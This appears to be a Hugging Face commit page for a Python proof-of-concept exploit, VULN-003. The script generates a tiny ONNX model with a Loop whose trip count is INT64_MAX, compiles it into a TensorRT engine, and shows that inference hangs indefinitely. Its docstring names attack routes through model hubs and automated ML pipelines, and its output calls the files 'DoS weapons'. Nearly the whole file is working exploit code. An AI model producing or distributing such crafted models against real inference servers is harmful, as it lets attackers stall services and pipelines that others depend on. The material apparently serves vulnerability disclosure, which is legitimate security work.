treforbenbow commited on
Commit
2fc3065
·
verified ·
1 Parent(s): 13648ce

Upload vuln003_loop_dos.py with huggingface_hub

Browse files
Files changed (1) hide show
  1. vuln003_loop_dos.py +230 -0
vuln003_loop_dos.py ADDED
@@ -0,0 +1,230 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ VULN-003 PoC: TensorRT Denial of Service via ONNX Loop with INT64_MAX Iterations
3
+
4
+ A crafted ONNX model (338 bytes) containing a Loop operator with max_trip_count
5
+ set to INT64_MAX (9,223,372,036,854,775,807) compiles into a valid TensorRT
6
+ engine (20,252 bytes) that hangs indefinitely during inference.
7
+
8
+ Attack vectors:
9
+ 1. ONNX model on model hub -> victim compiles to engine -> inference hangs
10
+ 2. Pre-compiled engine file on model hub -> victim loads -> inference hangs
11
+ 3. Automated ML pipeline ingests malicious model -> entire pipeline stalls
12
+
13
+ Impact:
14
+ - Permanent denial of service for TensorRT inference servers
15
+ - No timeout mechanism in execute_async_v3() — hangs until process is killed
16
+ - Tiny file size (338 bytes ONNX / 20KB engine) makes distribution trivial
17
+ - Affects Triton Inference Server, TensorRT-LLM, any TRT-based pipeline
18
+ """
19
+ import os
20
+ import sys
21
+ import time
22
+ import subprocess
23
+ import numpy as np
24
+ import onnx
25
+ from onnx import helper, TensorProto, numpy_helper
26
+
27
+ POC_DIR = os.path.dirname(os.path.abspath(__file__))
28
+
29
+
30
+ def create_loop_dos_model():
31
+ """Create minimal ONNX model with Loop(INT64_MAX)."""
32
+ # Loop body: Relu (trivial computation)
33
+ body_input = helper.make_tensor_value_info('i', TensorProto.INT64, [])
34
+ body_cond_in = helper.make_tensor_value_info('cond_in', TensorProto.BOOL, [])
35
+ body_x_in = helper.make_tensor_value_info('x_in', TensorProto.FLOAT, [1, 4])
36
+ body_cond_out = helper.make_tensor_value_info('cond_out', TensorProto.BOOL, [])
37
+ body_x_out = helper.make_tensor_value_info('x_out', TensorProto.FLOAT, [1, 4])
38
+
39
+ relu = helper.make_node('Relu', ['x_in'], ['x_out'])
40
+ identity_cond = helper.make_node('Identity', ['cond_in'], ['cond_out'])
41
+ body = helper.make_graph(
42
+ [relu, identity_cond], 'loop_body',
43
+ [body_input, body_cond_in, body_x_in],
44
+ [body_cond_out, body_x_out]
45
+ )
46
+
47
+ # Main graph
48
+ X = helper.make_tensor_value_info('input', TensorProto.FLOAT, [1, 4])
49
+ Y = helper.make_tensor_value_info('output', TensorProto.FLOAT, [1, 4])
50
+
51
+ # INT64_MAX = 9,223,372,036,854,775,807
52
+ max_trip = numpy_helper.from_array(
53
+ np.array(0x7FFFFFFFFFFFFFFF, dtype=np.int64), 'max_trip'
54
+ )
55
+ cond_init = numpy_helper.from_array(np.array(True, dtype=bool), 'cond_init')
56
+
57
+ loop = helper.make_node(
58
+ 'Loop', ['max_trip', 'cond_init', 'input'], ['output'],
59
+ body=body
60
+ )
61
+
62
+ graph = helper.make_graph([loop], 'loop_dos', [X], [Y], [max_trip, cond_init])
63
+ model = helper.make_model(graph, opset_imports=[helper.make_opsetid('', 13)])
64
+ model.ir_version = 7
65
+ return model
66
+
67
+
68
+ def build_engine(model_path, engine_path):
69
+ """Build TensorRT engine from ONNX model."""
70
+ import tensorrt as trt
71
+
72
+ logger = trt.Logger(trt.Logger.WARNING)
73
+ builder = trt.Builder(logger)
74
+ network = builder.create_network(
75
+ 1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)
76
+ )
77
+ parser = trt.OnnxParser(network, logger)
78
+
79
+ if not parser.parse_from_file(model_path):
80
+ for i in range(parser.num_errors):
81
+ print(f" Parse error: {parser.get_error(i)}")
82
+ return False
83
+
84
+ config = builder.create_builder_config()
85
+ config.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 1 << 24)
86
+
87
+ serialized = builder.build_serialized_network(network, config)
88
+ if not serialized:
89
+ print(" Build failed")
90
+ return False
91
+
92
+ with open(engine_path, 'wb') as f:
93
+ f.write(bytes(serialized))
94
+ return True
95
+
96
+
97
+ def test_inference_subprocess(engine_path, timeout=30):
98
+ """Run inference in subprocess and measure hang time."""
99
+ script = f'''
100
+ import tensorrt as trt, numpy as np, torch, time, sys
101
+
102
+ with open(r"{engine_path}", "rb") as f:
103
+ data = f.read()
104
+
105
+ logger = trt.Logger(trt.Logger.ERROR)
106
+ runtime = trt.Runtime(logger)
107
+ engine = runtime.deserialize_cuda_engine(data)
108
+ if not engine:
109
+ print("DESER_FAIL")
110
+ sys.exit(1)
111
+
112
+ context = engine.create_execution_context()
113
+ device = torch.device("cuda:0")
114
+ inp = torch.randn(1, 4, device=device)
115
+ out = torch.empty(1, 4, device=device)
116
+ context.set_tensor_address("input", inp.data_ptr())
117
+ context.set_tensor_address("output", out.data_ptr())
118
+
119
+ stream = torch.cuda.current_stream()
120
+ print("INFERENCE_STARTED")
121
+ sys.stdout.flush()
122
+ start = time.time()
123
+ context.execute_async_v3(stream.cuda_stream)
124
+ stream.synchronize()
125
+ elapsed = time.time() - start
126
+ print(f"INFERENCE_DONE time={{elapsed:.1f}}s")
127
+ '''
128
+ start = time.time()
129
+ try:
130
+ r = subprocess.run(
131
+ [sys.executable, "-c", script],
132
+ capture_output=True, text=True, timeout=timeout
133
+ )
134
+ elapsed = time.time() - start
135
+ return False, elapsed, r.stdout.strip(), r.returncode
136
+ except subprocess.TimeoutExpired:
137
+ elapsed = time.time() - start
138
+ return True, elapsed, "TIMEOUT", -1
139
+
140
+
141
+ def main():
142
+ print("=" * 70)
143
+ print("VULN-003: TensorRT Inference DoS via ONNX Loop(INT64_MAX)")
144
+ print("=" * 70)
145
+
146
+ # Step 1: Create malicious ONNX model
147
+ model = create_loop_dos_model()
148
+ onnx_path = os.path.join(POC_DIR, "dos_loop.onnx")
149
+ with open(onnx_path, 'wb') as f:
150
+ f.write(model.SerializeToString())
151
+
152
+ onnx_size = os.path.getsize(onnx_path)
153
+ print(f"\n[1] Malicious ONNX model: {onnx_path}")
154
+ print(f" Size: {onnx_size} bytes")
155
+ print(f" Loop max_trip_count: {0x7FFFFFFFFFFFFFFF:,} (INT64_MAX)")
156
+ print(f" Loop body: single Relu operation")
157
+
158
+ # Step 2: Build TensorRT engine
159
+ engine_path = os.path.join(POC_DIR, "dos_loop.engine")
160
+ print(f"\n[2] Building TensorRT engine...")
161
+ if not build_engine(onnx_path, engine_path):
162
+ print(" ERROR: Engine build failed")
163
+ sys.exit(1)
164
+
165
+ engine_size = os.path.getsize(engine_path)
166
+ print(f" Engine: {engine_path}")
167
+ print(f" Size: {engine_size} bytes")
168
+ print(f" Build completed normally — no error, no warning")
169
+
170
+ # Step 3: Baseline — normal model inference
171
+ print(f"\n[3] Baseline: Normal model inference")
172
+ baseline_onnx = os.path.join(POC_DIR, "normal_loop.onnx")
173
+
174
+ # Normal loop with 10 iterations
175
+ body_input = helper.make_tensor_value_info('i', TensorProto.INT64, [])
176
+ body_cond_in = helper.make_tensor_value_info('cond_in', TensorProto.BOOL, [])
177
+ body_x_in = helper.make_tensor_value_info('x_in', TensorProto.FLOAT, [1, 4])
178
+ body_cond_out = helper.make_tensor_value_info('cond_out', TensorProto.BOOL, [])
179
+ body_x_out = helper.make_tensor_value_info('x_out', TensorProto.FLOAT, [1, 4])
180
+ relu = helper.make_node('Relu', ['x_in'], ['x_out'])
181
+ id_cond = helper.make_node('Identity', ['cond_in'], ['cond_out'])
182
+ body = helper.make_graph([relu, id_cond], 'body',
183
+ [body_input, body_cond_in, body_x_in],
184
+ [body_cond_out, body_x_out])
185
+ X = helper.make_tensor_value_info('input', TensorProto.FLOAT, [1, 4])
186
+ Y = helper.make_tensor_value_info('output', TensorProto.FLOAT, [1, 4])
187
+ trip = numpy_helper.from_array(np.array(10, dtype=np.int64), 'max_trip')
188
+ cond = numpy_helper.from_array(np.array(True, dtype=bool), 'cond_init')
189
+ loop = helper.make_node('Loop', ['max_trip', 'cond_init', 'input'], ['output'], body=body)
190
+ graph = helper.make_graph([loop], 'normal', [X], [Y], [trip, cond])
191
+ normal_model = helper.make_model(graph, opset_imports=[helper.make_opsetid('', 13)])
192
+ normal_model.ir_version = 7
193
+ with open(baseline_onnx, 'wb') as f:
194
+ f.write(normal_model.SerializeToString())
195
+
196
+ baseline_engine = os.path.join(POC_DIR, "normal_loop.engine")
197
+ build_engine(baseline_onnx, baseline_engine)
198
+
199
+ hung, elapsed, out, rc = test_inference_subprocess(baseline_engine, timeout=15)
200
+ print(f" Normal model (10 iterations): {out} ({elapsed:.1f}s)")
201
+
202
+ # Step 4: DoS inference
203
+ print(f"\n[4] DoS inference (will hang for 30 seconds then be killed)")
204
+ hung, elapsed, out, rc = test_inference_subprocess(engine_path, timeout=30)
205
+ if hung:
206
+ print(f" TIMEOUT after {elapsed:.1f}s — INFERENCE IS HANGING")
207
+ print(f" [!!!] DoS CONFIRMED")
208
+ else:
209
+ print(f" Inference completed: {out} ({elapsed:.1f}s)")
210
+
211
+ # Summary
212
+ print(f"\n{'='*70}")
213
+ print("VULNERABILITY SUMMARY")
214
+ print(f"{'='*70}")
215
+ print(f"[!!!] TensorRT inference hangs indefinitely on Loop(INT64_MAX)")
216
+ print(f"[!!!] ONNX model size: {onnx_size} bytes")
217
+ print(f"[!!!] Engine file size: {engine_size} bytes")
218
+ print(f"[!!!] Both formats can be used as DoS weapons")
219
+ print(f"[!!!] No timeout in execute_async_v3() — runs until process killed")
220
+ print(f"[!!!] Loop iterations: 9,223,372,036,854,775,807 (INT64_MAX)")
221
+ print(f"[!!!] Even at 1 billion iterations/sec, would take 292 YEARS")
222
+
223
+ # Cleanup temp files
224
+ for f in [baseline_onnx, baseline_engine]:
225
+ if os.path.exists(f):
226
+ os.remove(f)
227
+
228
+
229
+ if __name__ == "__main__":
230
+ main()